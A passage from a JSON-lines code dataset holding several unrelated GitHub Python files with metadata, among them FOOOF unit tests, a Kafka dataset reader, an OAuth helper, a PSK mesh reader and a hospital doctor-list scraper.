FOOOF(verbose=False)\n\n ## Check checks & errors done in `_prepare_data`\n\n # Check wrong data type error\n with raises(DataError):\n tfm.fit(list(xs), list(ys))\n\n # Check dimension error\n with raises(DataError):\n tfm.fit(xs, np.reshape(ys, [1, len(ys)]))\n\n # Check shape mismatch error\n with raises(InconsistentDataError):\n tfm.fit(xs[:-1], ys)\n\n # Check complex inputs error\n with raises(DataError):\n tfm.fit(xs, ys.astype('complex'))\n\n # Check trim_spectrum range\n tfm.fit(xs, ys, [3, 40])\n\n # Check freq of 0 issue\n xs, ys = gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2])\n tfm.fit(xs, ys)\n assert tfm.freqs[0] != 0\n\n # Check error if there is a post-logging inf or nan\n with raises(DataError): # Double log (1) -> -inf\n tfm.fit(np.array([1, 2, 3]), np.log10(np.array([1, 2, 3])))\n with raises(DataError): # Log (-1) -> NaN\n tfm.fit(np.array([1, 2, 3]), np.array([-1, 2, 3]))\n\n ## Check errors & errors done in `fit`\n\n # Check fit, and string report model error (no data / model fit)\n tfm = FOOOF(verbose=False)\n with raises(NoDataError):\n tfm.fit()\n\ndef test_fooof_load():\n \"\"\"Test load into FOOOF. Note: loads files from test_core_io.\"\"\"\n\n # Test loading just results\n tfm = FOOOF(verbose=False)\n file_name_res = 'test_fooof_res'\n tfm.load(file_name_res, TEST_DATA_PATH)\n # Check that result attributes get filled\n for result in OBJ_DESC['results']:\n assert not np.all(np.isnan(getattr(tfm, result)))\n # Test that settings and data are None\n # Except for aperiodic mode, which can be inferred from the data\n for setting in OBJ_DESC['settings']:\n if setting is not 'aperiodic_mode':\n assert getattr(tfm, setting) is None\n assert getattr(tfm, 'power_spectrum') is None\n\n # Test loading just settings\n tfm = FOOOF(verbose=False)\n file_name_set = 'test_fooof_set'\n tfm.load(file_name_set, TEST_DATA_PATH)\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) is not None\n # Test that results and data are None\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n assert tfm.power_spectrum is None\n\n # Test loading just data\n tfm = FOOOF(verbose=False)\n file_name_dat = 'test_fooof_dat'\n tfm.load(file_name_dat, TEST_DATA_PATH)\n assert tfm.power_spectrum is not None\n # Test that settings and results are None\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) is None\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n\n # Test loading all elements\n tfm = FOOOF(verbose=False)\n file_name_all = 'test_fooof_all'\n tfm.load(file_name_all, TEST_DATA_PATH)\n for result in OBJ_DESC['results']:\n assert not np.all(np.isnan(getattr(tfm, result)))\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) is not None\n for data in OBJ_DESC['data']:\n assert getattr(tfm, data) is not None\n for meta_dat in OBJ_DESC['meta_data']:\n assert getattr(tfm, meta_dat) is not None\n\ndef test_adds():\n \"\"\"Tests methods that add data to FOOOF objects.\n\n Checks: add_data, add_settings, add_results.\n \"\"\"\n\n # Note: uses it's own tfm, to not add stuff to the global one\n tfm = get_tfm()\n\n # Test adding data\n freqs, pows = np.array([1, 2, 3]), np.array([10, 10, 10])\n tfm.add_data(freqs, pows)\n assert np.all(tfm.freqs == freqs)\n assert np.all(tfm.power_spectrum == np.log10(pows))\n\n # Test adding settings\n fooof_settings = FOOOFSettings([1, 4], 6, 0, 2, 'fixed')\n tfm.add_settings(fooof_settings)\n for setting in OBJ_DESC['settings']:\n assert getattr(tfm, setting) == getattr(fooof_settings, setting)\n\n # Test adding meta data\n fooof_meta_data = FOOOFMetaData([3, 40], 0.5)\n tfm.add_meta_data(fooof_meta_data)\n for meta_dat in OBJ_DESC['meta_data']:\n assert getattr(tfm, meta_dat) == getattr(fooof_meta_data, meta_dat)\n\n # Test adding results\n fooof_results = FOOOFResults([1, 1], [10, 0.5, 0.5], 0.95, 0.02, [10, 0.5, 0.25])\n tfm.add_results(fooof_results)\n for setting in OBJ_DESC['results']:\n assert getattr(tfm, setting) == getattr(fooof_results, setting.strip('_'))\n\ndef test_obj_gets(tfm):\n \"\"\"Tests methods that return FOOOF data objects.\n\n Checks: get_settings, get_meta_data, get_results\n \"\"\"\n\n settings = tfm.get_settings()\n assert isinstance(settings, FOOOFSettings)\n meta_data = tfm.get_meta_data()\n assert isinstance(meta_data, FOOOFMetaData)\n results = tfm.get_results()\n assert isinstance(results, FOOOFResults)\n\ndef test_get_params(tfm):\n \"\"\"Test the get_params method.\"\"\"\n\n for dname in ['aperiodic_params', 'aperiodic', 'peak_params', 'peak',\n 'error', 'r_squared', 'gaussian_params', 'gaussian']:\n assert np.any(tfm.get_params(dname))\n\n if dname == 'aperiodic_params' or dname == 'aperiodic':\n for dtype in ['offset', 'exponent']:\n assert np.any(tfm.get_params(dname, dtype))\n\n if dname == 'peak_params' or dname == 'peak':\n for dtype in ['CF', 'PW', 'BW']:\n assert np.any(tfm.get_params(dname, dtype))\n\ndef test_copy():\n \"\"\"Test copy FOOOF method.\"\"\"\n\n tfm = FOOOF(verbose=False)\n ntfm = tfm.copy()\n\n assert tfm != ntfm\n\ndef test_fooof_prints(tfm):\n \"\"\"Test methods that print (alias and pass through methods).\n\n Checks: print_settings, print_results, print_report_issue.\n \"\"\"\n\n tfm.print_settings()\n tfm.print_results()\n tfm.print_report_issue()\n\n@plot_test\ndef test_fooof_plot(tfm, skip_if_no_mpl):\n \"\"\"Check the alias to plot FOOOF.\"\"\"\n\n tfm.plot()\n\ndef test_fooof_resets():\n \"\"\"Check that all relevant data is cleared in the reset method.\"\"\"\n\n # Note: uses it's own tfm, to not clear the global one\n tfm = get_tfm()\n\n tfm._reset_data_results(True, True, True)\n tfm._reset_internal_settings()\n\n for data in ['data', 'model_components']:\n for field in OBJ_DESC[data]:\n assert getattr(tfm, field) is None\n for field in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, field)))\n assert tfm.freqs is None and tfm.fooofed_spectrum_ is None\n\ndef test_fooof_report(skip_if_no_mpl):\n \"\"\"Check that running the top level model method runs.\"\"\"\n\n tfm = FOOOF(verbose=False)\n\n tfm.report(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n\n assert tfm\n\ndef test_fooof_fit_failure():\n \"\"\"Test FOOOF fit failures.\"\"\"\n\n ## Induce a runtime error, and check it runs through\n tfm = FOOOF(verbose=False)\n tfm._maxfev = 5\n\n tfm.fit(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n\n # Check after failing out of fit, all results are reset\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n\n ## Monkey patch to check errors in general\n # This mimics the main fit-failure, without requiring bad data / waiting for it to fail.\n tfm = FOOOF(verbose=False)\n def raise_runtime_error(*args, **kwargs):\n raise FitError('Test-MonkeyPatch')\n tfm._fit_peaks = raise_runtime_error\n\n # Run a FOOOF fit - this should raise an error, but continue in try/except\n tfm.fit(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n\n # Check after failing out of fit, all results are reset\n for result in OBJ_DESC['results']:\n assert np.all(np.isnan(getattr(tfm, result)))\n\ndef test_fooof_debug():\n \"\"\"Test FOOOF fit failure in debug mode.\"\"\"\n\n tfm = FOOOF(verbose=False)\n tfm._maxfev = 5\n\n tfm.set_debug_mode(True)\n assert tfm._debug is True\n\n with raises(FitError):\n tfm.fit(*gen_power_spectrum([3, 50], [50, 2], [10, 0.5, 2, 20, 0.3, 4]))\n","repo_name":"JohnGriffiths/eeg_notebooks_doc","sub_path":"fooof/tests/objs/test_fit.py","file_name":"test_fit.py","file_ext":"py","file_size_in_byte":11969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8442009452","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.home,\n name='home'),\n url(r'^delete/$', views.delete_member,\n name='delete'),\n url(r'^get_pple/$', views.get_list_of_pple,\n name='get_pple'),\n url(r'^change_typemember/$', views.change_typemember,\n name='change_typemember'),\n url(r'^send_mail/$', views.send_mail,\n name='send_mail'),\n]\n","repo_name":"unistra/eva","sub_path":"mecc/apps/commission/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34426163975","text":"from tensorflow.python.data.ops import readers\nimport tensorflow as tf\nfrom deepray.datasets.datapipeline import DataPipeLine\nfrom absl import flags\n\nFLAGS = flags.FLAGS\n\n\nclass KafkaDataset(DataPipeLine):\n\n def parse(self, raw_message, raw_key):\n context_features, sequence_features = {}, {}\n for key, dim in self.feature_map[\"FLOAT\"].items():\n context_features[key] = tf.io.FixedLenFeature([], tf.float32)\n for key, dim in self.feature_map[\"INT\"].items():\n context_features[key] = tf.io.FixedLenFeature([], tf.int64)\n for key, dim in self.feature_map[\"VARINT\"].items():\n sequence_features[key] = tf.io.VarLenFeature(tf.int64)\n\n tensor, sparse_tensor = tf.io.parse_single_sequence_example(\n serialized=raw_message, context_features=context_features, sequence_features=sequence_features\n )\n reshaped_tensor = {}\n for fea in context_features:\n reshaped_tensor[fea] = tensor[fea]\n # reshaped_tensor[fea] = tf.reshape(tensor[fea], [1])\n label = reshaped_tensor.pop(FLAGS.label)\n for fea in sequence_features:\n reshaped_tensor[fea] = sparse_tensor[fea]\n # reshaped_tensor[fea] = tf.sparse.reshape(sparse_tensor[fea], [-1])\n return reshaped_tensor, label\n\n def build_dataset(self):\n dataset = (\n readers.KafkaGroupIODataset(\n topics=self.conf[\"Kafka\"][\"topics\"],\n group_id=self.conf[\"Kafka\"][\"group_id\"],\n servers=self.conf[\"Kafka\"][\"servers\"],\n stream_timeout=3000,\n configuration=self.conf[\"Kafka\"][\"configuration\"],\n ).map(map_func=self.parse, num_parallel_calls=FLAGS.parallel_parse).batch(FLAGS.batch_size)\n )\n return dataset\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/datasets/kafka_dataset.py","file_name":"kafka_dataset.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"38224331045","text":"import argparse\nimport cv2\nimport datetime\nimport requests\n\nfrom image_processing import crop_face_transform\nimport utils\n\n\ndef send_frames(video, addr, size=(360, 240), fps=10, frames_to_send=-1, crop=False, print_interval=-1, log=None):\n crop_str = \"True\" if crop else \"False\"\n full_address = f\"{addr}/cropped={crop_str}&width={size[0]}&height={size[1]}\"\n\n send_forever = (frames_to_send == -1)\n\n frames_sent = 0\n\n fps_tracker = utils.FpsTracker(fps_limit=fps, average_over=10, print_interval=print_interval, log=log)\n fps_tracker.track()\n while frames_sent < frames_to_send or send_forever:\n success, frame = video.read()\n if not success:\n print(\"ERROR: Could not capture from web cam\")\n break\n\n if crop:\n frame = crop_face_transform(frame)[\"img\"]\n\n frame = cv2.resize(frame, dsize=size)\n\n # grab the current timestamp and draw it on the frame\n timestamp = datetime.datetime.now()\n cv2.putText(frame, timestamp.strftime(\n \"%A %d %B %Y %I:%M:%S%p\"), (10, frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n\n (success, encodedImage) = cv2.imencode(\".jpg\", frame)\n if not success:\n continue\n\n headers = {'content-type': 'image/jpeg'}\n try:\n requests.post(full_address, data=encodedImage.tostring(), headers=headers)\n except Exception as e:\n print(f\"Error occurred while trying to send image:\\n\\t{e}\\nExiting...\")\n exit()\n\n frames_sent += 1\n fps_tracker.frame_sent()\n\n fps_tracker.close_log()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Sends images to end point')\n parser.add_argument('-a', '--address', dest='address',\n help=\"Web address to send the images captured from the camera to\", required=True)\n parser.add_argument('-f', '--frames', dest='frames', default=-1, type=int,\n help='Amount of frames from the camera to send to the endpoint (default: infinite)')\n parser.add_argument('--fps', default=-1, type=int, dest='fps',\n help='FPS to capture images at (default: infinite)')\n parser.add_argument('-j', '--jetson', dest='jetson', action='store_true',\n help='Flag specifying if you are running this from an nvidia jetson')\n parser.add_argument('-c', '--crop', dest='crop', action='store_true',\n help='Flag specifying if you would like to perform face cropping before sending the image')\n parser.add_argument('-s', '--size', dest='size', nargs=2, type=int, default=[360, 240], metavar=('width', 'height'),\n help='Specify what size the image sent should be (default: 360 x 240)')\n parser.add_argument('-p', '--print', dest='print', type=int, default=-1,\n help='Print interval for the FPS tracker')\n parser.add_argument('-l', '--log', dest='log', default=None,\n help='File to log raw FPS data to')\n args = parser.parse_args()\n\n if args.jetson:\n video = cv2.VideoCapture(utils.jetson_gstreamer_pipeline(), cv2.CAP_GSTREAMER)\n else:\n video = cv2.VideoCapture(0)\n\n send_frames(video, args.address, size=tuple(args.size), fps=args.fps, frames_to_send=args.frames, crop=args.crop,\n print_interval=args.print, log=args.log)\n video.release()\n","repo_name":"John-Boccio/FacialExpressionRecognition","sub_path":"FlaskSend.py","file_name":"FlaskSend.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36756882201","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 29 2021\r\nPart 4: New MS2 Loading\r\n@author: Li Zimu\r\n\"\"\"\r\nimport os\r\nimport pandas as pd\r\nimport re\r\n\r\n\r\n\r\n# read feature files\r\ndef read_xlsx_file(file_name):\r\n# file_name=Characteristic_ions_file_name\r\n if '.csv' in file_name:\r\n df = pd.read_csv(file_name)\r\n# print('running--------')\r\n else:\r\n df = pd.read_excel(file_name)\r\n data=df.values.tolist()\r\n return data\r\n\r\ndef check(str):\r\n\r\n my_re = re.compile(r'[A-Za-z]')\r\n\r\n res = re.findall(my_re,str)\r\n if len(res):\r\n\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n# Read '.mgf' file, transform to list\r\ndef seed_MS2toList_align(file_path,mgf_name):\r\n# mgf_name = seed_file_name\r\n MS2List=[]\r\n seed_name = [\"HCAAs\" ,\"CGFs\",\"BOAs\"]\r\n if any(e in mgf_name for e in seed_name):\r\n mark = \"seed_metabolite\"\r\n else:\r\n mark = 0\r\n with open(file_path+mgf_name)as f:\r\n for line in f:\r\n line=line.rstrip()\r\n if len(line) < 4:\r\n continue\r\n if line== \"BEGIN IONS\":\r\n oneMS2List=[0,0,0,0,0]\r\n id_list_1 = ''\r\n id_list_2 = ''\r\n spec=[]\r\n continue\r\n if line[:3]=='ID=':\r\n id_list_1=line[3:]\r\n continue\r\n if line[:9]=='Align_ID=':\r\n id_list_2=line[9:]\r\n continue\r\n if line[:5]=='NAME=':\r\n oneMS2List[2]=line[5:]\r\n continue\r\n # oneMS2List[0]=int(line[1])\r\n if line[:12] == \"RTINSECONDS=\":\r\n oneMS2List[3]=float(line[12:])\r\n continue\r\n if line[:8]=='PEPMASS=':\r\n line=re.split('=| ',line)\r\n oneMS2List[4]=float(line[1])\r\n continue\r\n\r\n if line==\"END IONS\":\r\n oneMS2List[0]=mgf_name\r\n oneMS2List[1]=mark\r\n oneMS2List.append(spec)\r\n oneMS2List.append(id_list_1)\r\n oneMS2List.append(id_list_2)\r\n MS2List.append(oneMS2List)\r\n continue\r\n\r\n # if line.find(\"=\") == -1:\r\n if check(line):\r\n mz_intensity=[]\r\n line=re.split('[ |\\t]+',line)\r\n mz_intensity.append(float(line[0]))\r\n mz_intensity.append(float(line[1]))\r\n spec.append(mz_intensity)\r\n continue\r\n\r\n return MS2List\r\n\r\n\r\n\r\n# Import all the new '.mgf' files\r\noutput_mgf_file_path = 'D:\\\\Python_code\\\\script_code\\\\new_mgf_file\\\\'\r\n\r\nmfg_all_name = os.listdir(output_mgf_file_path)\r\nMS2List = []\r\nfor name in mfg_all_name:\r\n\r\n MS2List+=seed_MS2toList_align(output_mgf_file_path,name)\r\nprint('Read new generated mgf files Finished')\r\n","repo_name":"DLUT-datas/KHMN","sub_path":"4 New MS2 Loading.py","file_name":"4 New MS2 Loading.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11215636172","text":"from django.test import TestCase\n\n# Create your tests here.\nclass TestCalls(APITestCase):\n\n def setUp(self):\n\n self.session = self.client.session\n self.request = self.client.post(\n reverse(\"input\", args=[\"list\"]), {\"word_list\": words}, format=\"json\"\n )\n self.request.session = {}","repo_name":"danielpassy/Linx-App","sub_path":"backend/weather/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1920212096","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 24 10:00:40 2021\n\n@author: rohan\n\"\"\"\n\nimport nltk #we'll use nltk.pos_tag() for pos tagging \n#for importing speeches\nfrom nltk.corpus import state_union\n#for custom tokenizing \nfrom nltk.tokenize import PunktSentenceTokenizer\n\n#importint train text\ntrain_text = state_union.raw(\"2005-GWBush.txt\")\n#target text for pos tag\nbush_speech = state_union.raw(\"2006-GWBush.txt\")\n\n\n#making custom tokenizer\ncustom_sent_tokenizer = PunktSentenceTokenizer(train_text)\n#tokens from custom tokenizer\nbush_speech_tokens = custom_sent_tokenizer.tokenize(bush_speech)\n\n\n\ndef process_content():\n try:\n for i in bush_speech_tokens:\n words = nltk.word_tokenize(i)\n tagged_pos = nltk.pos_tag(words)\n '''chunkGram = r\"\"\"Chunk: {*}\"\"\"\n chunkParser = nltk.RegexpParser(chunkGram)\n chunked = chunkParser.parse(tagged_pos)'''\n chunkGram = r\"\"\"Chunk: {<.*>+}\n }+{\"\"\"\n chunkParser = nltk.RegexpParser(chunkGram)\n chunked = chunkParser.parse(tagged_pos)\n print(chunked)\n chunked.draw()\n except Exception as e:\n print(str(e))\nprocess_content()\n","repo_name":"imrk97/MLTutorial","sub_path":"NLP_santdex/chunking.py","file_name":"chunking.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810507755","text":"from google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.oauth2.credentials import Credentials\nfrom google.auth.transport.requests import Request\n\n\nclass AuthClient:\n def __init__(self, auth_api=None):\n self.api = auth_api()\n\n @classmethod\n def create(cls):\n return cls(GoogleAuthAPI)\n\n @classmethod\n def create_null(cls):\n return cls(AuthStub)\n\n def get_credentials(self):\n return self.api.get_credentials()\n\n\nclass GoogleAuthAPI:\n def run_browser_authentication(self):\n SCOPES = [\"https://www.googleapis.com/auth/gmail.send\"]\n flow = InstalledAppFlow.from_client_secrets_file(\"credentials.json\", SCOPES)\n return flow.run_local_server(port=0)\n\n def get_credentials(self):\n stored_creds = self.load_credentials(\"token.json\")\n\n if stored_creds and stored_creds.expired and stored_creds.refresh_token:\n print(\"Refreshing expired credentials...\")\n stored_creds.refresh(Request())\n self.store_credentials(stored_creds)\n return stored_creds\n elif not stored_creds.expired:\n print(\"Reusing stored credentials...\")\n return stored_creds\n else:\n print(\"No reusable credentials found; authenticating again...\")\n creds = self.run_browser_authentication()\n self.store_credentials(creds)\n return creds\n\n def store_credentials(self, creds):\n with open(\"token.json\", \"w\") as token:\n token.write(creds.to_json())\n\n def load_credentials(self, json):\n return Credentials.from_authorized_user_file(json)\n\n\nclass AuthStub:\n def get_credentials(self):\n creds = {\n \"token\": \"TOKEN\",\n \"refresh_token\": \"REFRESH TOKEN\",\n \"token_uri\": \"https://oauth2.googleapis.com/token\",\n \"client_id\": \"CLIENTID\",\n \"client_secret\": \"CLIENTSECRET\",\n \"scopes\": [\"https://www.googleapis.com/auth/gmail.send\"],\n \"expiry\": \"EXPIRY\",\n }\n return creds\n","repo_name":"cadolphs/google_photo_emailer","sub_path":"photo_emailer/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31202317443","text":"import math\n\n\ndef MinDivisor(n):\n for i in range(2, math.ceil(math.sqrt(n)) + 1):\n if n % i == 0:\n return i\n return n\n\n\ndef IsPrime(n):\n if MinDivisor(n) == n:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n n = int(input())\n if IsPrime(n):\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"samikhailov/coursera","sub_path":"python_osnovy_programmirovaniya/week_4/provierka-chisla-na-prostotu.py","file_name":"provierka-chisla-na-prostotu.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5358177356","text":"\"\"\"Database migration.\"\"\"\n\nimport sys\nimport os\nimport inspect\n\nimport DbMigrator\nfrom DbMigrator.driver import Driver\nfrom DbMigrator.defaultdatabasesource import DefaultDatabaseSource\nfrom DbMigrator.mysqldatabasehandler import MySqlDatabaseHandler\n\ndef build_driver():\n f = inspect.getfile(inspect.currentframe())\n this_dir = os.path.dirname(os.path.abspath(f))\n inifile = os.path.join(this_dir, 'conn.ini')\n if not os.path.exists(inifile):\n inifile = inifile + '.template'\n if not os.path.exists(inifile):\n raise Exception(\"Missing ini file at \" + inifile)\n schema_root_dir = os.path.normpath(os.path.join(this_dir, '..'))\n dds = DefaultDatabaseSource(inifile, schema_root_dir)\n driver = Driver(dds, MySqlDatabaseHandler())\n driver.default_database = \"schema\"\n driver.is_debug_printing = True\n return driver\n\ndef main():\n d = build_driver()\n d.main(sys.argv)\n\nif __name__ == '__main__':\n main()\n","repo_name":"jzohrab/DbMigrator_Demo","sub_path":"tools/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14534566344","text":"import os\n\ndef GetAlteredInstructions(alterationIndex):\n jmpOrNopIndex = 0\n alteredInstrctions = []\n for instruction in instructions:\n instructionType = instruction[0]\n if instructionType == \"jmp\" or instructionType == \"nop\":\n if jmpOrNopIndex == alterationIndex:\n if instructionType == \"jmp\":\n instructionType = \"nop\"\n else:\n instructionType = \"jmp\"\n jmpOrNopIndex += 1\n\n alteredInstrctions.append([ instructionType, instruction[1], instruction[2] ])\n return alteredInstrctions\n\ndef CheckInstructions(instructionList):\n accumulator = 0\n instructionIndex = 0\n infinate = True\n done = False\n while not done:\n if instructionIndex >= len(instructionList):\n infinate = False\n done = True\n break\n instruction = instructionList[instructionIndex]\n if instruction[2] == 1:\n done = True\n break\n elif instruction[0] == \"jmp\":\n instructionIndex += instruction[1]\n elif instruction[0] == \"acc\":\n accumulator += instruction[1]\n instructionIndex += 1\n elif instruction[0] == \"nop\":\n instructionIndex += 1\n instruction[2] += 1\n return [infinate, accumulator]\n\nscript_dir = os.path.dirname(os.path.abspath(__file__))\ninstructions = []\n\nwith open(os.path.join(script_dir, \"input.txt\"), \"r\") as file:\n for line in file:\n instructionParts = line.strip('\\n').split(' ')\n instructions.append([ instructionParts[0], int(instructionParts[1]), 0 ])\n\nprint ('Processed ' + str(len(instructions)) + ' instructions')\n\nprint('Solution 1: accumulator is ' + str(CheckInstructions(GetAlteredInstructions(-1))[1]))\n\naccumulatorResult = 0\ninfinate = True\ntryIndex = 0\nwhile infinate and tryIndex < len(instructions):\n alteredInstructions = GetAlteredInstructions(tryIndex)\n tryIndex += 1\n result = CheckInstructions(alteredInstructions)\n if not result[0]:\n infinate = result[0]\n accumulatorResult = result[1]\n break \n\nprint('Solution 2: accumulator is ' + str(accumulatorResult))","repo_name":"jtmach/AdventOfCode2019","sub_path":"20201208/20201208.py","file_name":"20201208.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24257009031","text":"from .data import *\nimport ctypes\n\n\nclass PskReader(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def read_types(fp, data_class: ctypes.Structure, section: Section, data):\n buffer_length = section.data_size * section.data_count\n buffer = fp.read(buffer_length)\n offset = 0\n for _ in range(section.data_count):\n data.append(data_class.from_buffer_copy(buffer, offset))\n offset += section.data_size\n\n def read(self, path) -> Psk:\n psk = Psk()\n with open(path, 'rb') as fp:\n while fp.read(1):\n fp.seek(-1, 1)\n section = Section.from_buffer_copy(fp.read(ctypes.sizeof(Section)))\n if section.name == b'ACTRHEAD':\n pass\n elif section.name == b'PNTS0000':\n PskReader.read_types(fp, Vector3, section, psk.points)\n elif section.name == b'VTXW0000':\n if section.data_size == ctypes.sizeof(Psk.Wedge16):\n PskReader.read_types(fp, Psk.Wedge16, section, psk.wedges)\n elif section.data_size == ctypes.sizeof(Psk.Wedge32):\n PskReader.read_types(fp, Psk.Wedge32, section, psk.wedges)\n else:\n raise RuntimeError('Unrecognized wedge format')\n elif section.name == b'FACE0000':\n PskReader.read_types(fp, Psk.Face, section, psk.faces)\n elif section.name == b'MATT0000':\n PskReader.read_types(fp, Psk.Material, section, psk.materials)\n elif section.name == b'REFSKELT':\n PskReader.read_types(fp, Psk.Bone, section, psk.bones)\n elif section.name == b'RAWWEIGHTS':\n PskReader.read_types(fp, Psk.Weight, section, psk.weights)\n elif section.name == b'FACE3200':\n PskReader.read_types(fp, Psk.Face32, section, psk.faces)\n elif section.name == b'VERTEXCOLOR':\n PskReader.read_types(fp, Color, section, psk.vertex_colors)\n elif section.name.startswith(b'EXTRAUVS'):\n PskReader.read_types(fp, Vector2, section, psk.extra_uvs)\n elif section.name == b'VTXNORMS':\n PskReader.read_types(fp, Vector3, section, psk.vertex_normals)\n else:\n raise RuntimeError(f'Unrecognized section \"{section.name} at position {15:fp.tell()}\"')\n return psk\n","repo_name":"SilverDash/io_scene_psk_psa","sub_path":"io_scene_psk_psa/psk/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"17654191561","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nauthor : Xiaojun Wang\r\ncreate date :\r\nmodified date: \r\nverstion : \r\n#==============================================================================\r\n# \r\n#==============================================================================\r\n\"\"\"\r\n#%%% import modules\r\nfrom urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\nimport time, codecs\r\n\r\n#%%% inputs and outputs\r\n#keshiDic = {}\r\n#for line in codecs.open('莆田市第一医院_简表.txt', encoding='utf-8'):\r\n# linelist = line.strip('\\n').strip('\\r').split('\\t')\r\n# keshiDic[linelist[2]] = 0\r\n#base = 'http://www.ptsyy.com/'\r\n#href = 'http://www.ptsyy.com/index.php/section.html'\r\n#html = urlopen(href)\r\n#bsObj = BeautifulSoup(html)\r\n#keshiLIST = bsObj.find('div', {'class':'right_main'}).findAll('td')\r\n#for ks in keshiLIST:\r\n# keshi = ks.get_text()[1:]\r\n# href = ks.find('a').attrs['href']\r\n# html = urlopen(href)\r\n# bsObj = BeautifulSoup(html)\r\n# kshref = bsObj.findAll('a',{'class':'more'})[2].attrs['href']\r\n# kshtml = urlopen(kshref)\r\n# bsObj = BeautifulSoup(kshtml)\r\n# try:\r\n# doctorLIST = bsObj.find('div',{'class':'r_doctor'}).findAll('div',{'class':'doctor'})\r\n# except:\r\n# continue\r\n# if len(doctorLIST)<1:continue\r\n# for doc in doctorLIST:\r\n# name = doc.find('a').find('img').attrs['alt']\r\n# href = doc.find('a').attrs['href']\r\n# string = '\\t'.join([name, keshi, href])\r\n# string = string.replace('\\u3000','').replace('\\r','').replace('\\n',' ')\r\n# string = string.replace('\\xa0','').replace(' ','')\r\n# outfile = codecs.open('莆田市第一医院_简表.txt', 'a', 'utf-8')\r\n# try:\r\n# outfile.write(string+'\\n') \r\n# except:\r\n# print(string.replace('\\t', '|'))\r\n# outfile.close()\r\n\r\n#%%\r\noutfile = open('莆田市第一医院_医生列表.txt', 'a')\r\noutfile.close()\r\ndoctorDic = {}\r\nfor line in codecs.open('莆田市第一医院_医生列表.txt', encoding='utf-8'):\r\n doctorDic[line.strip().split('\\t')[-1]]=0\r\n\r\nhref2doctor = {}\r\nfor line in codecs.open('莆田市第一医院_简表.txt', encoding='utf-8'):\r\n linelist = line.strip('\\n').strip('\\r').split('\\t')\r\n href2doctor[linelist[-1]] = '\\t'.join(linelist[0:-1])\r\n\r\nfor href in href2doctor:\r\n if href in doctorDic:\r\n continue\r\n try:\r\n html = urlopen(href)\r\n bsObj = BeautifulSoup(html)\r\n total = bsObj.find('div', {'style':'float:left;width:540px;'}).get_text().replace('\\n','').replace('\\t','')\r\n zhicheng = total.split('职称:')[1].split('简介:')[0]\r\n \r\n except:\r\n print(href)\r\n time.sleep(1)\r\n continue\r\n string = '\\t'.join([href2doctor[href], zhicheng, href])\r\n string = string.replace('\\u3000','').replace('\\r','').replace('\\n',' ')\r\n string = string.replace('\\xa0','').replace(' ',' ')\r\n outfile = codecs.open('莆田市第一医院_医生列表.txt', 'a','utf-8')\r\n try:\r\n outfile.write(string+'\\n')\r\n except:\r\n print(string.replace('\\t', '|'))\r\n outfile.close()\r\n time.sleep(1)\r\n","repo_name":"rockagain/PythonScript","sub_path":"extractDoctor莆田市第一医院.py","file_name":"extractDoctor莆田市第一医院.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20162503543","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# \"Open\n\n# In[518]:\n\n\nimport pandas as 